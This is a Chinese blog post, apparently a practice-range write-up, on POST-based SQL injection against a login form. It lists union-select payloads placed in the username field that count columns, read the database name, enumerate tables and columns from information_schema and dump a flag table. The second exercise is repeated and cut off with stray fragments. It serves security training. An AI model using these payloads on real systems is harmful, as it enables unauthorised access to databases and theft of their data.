[zkaq靶场]SQL注入--POST注入

本文详细介绍了SQL注入中的POST注入技术,包括其与GET注入的相似性、闭合方式检测、字段数探测、回显点定位、数据库与表的爆库与爆表操作,以及如何利用group_concat函数获取数据和flag。通过实例展示了如何进行POST注入攻击,揭示了网络安全中这一常见漏洞的危害。
摘要由CSDN通过智能技术生成

SQL注入–POST注入

SQL注入回顾:网络安全笔记-99-渗透-SQL注入

POST注入

POST型注入与GET型注入没有本质区别

POST注入一

输入账号密码,然后抓包


检测出单引号闭合的方式,接下来就可以进行注入.

检测出字段数

  • username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95

检测回显点


![]

爆库

  • username=admin1’ union select 1,2,database()–+&password=1&submit=%E7%99%BB%E5%BD%95

爆表

  • username=admin1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())–+&password=1&submit=%E7%99%BB%E5%BD%95

爆字段

  • username=admin1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘flag’)–+&password=1&submit=%E7%99%BB%E5%BD%95

爆数据

  • username=admin1’ union select 1,2,(select group_concat(flag) from flag)–+&password=1&submit=%E7%99%BB%E5%BD%95

获得flag.

POST注入二

原理相同,只是闭合方式为")

88970)]

获得flag.

POST注入二

原理相同,只是闭合方式为")

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值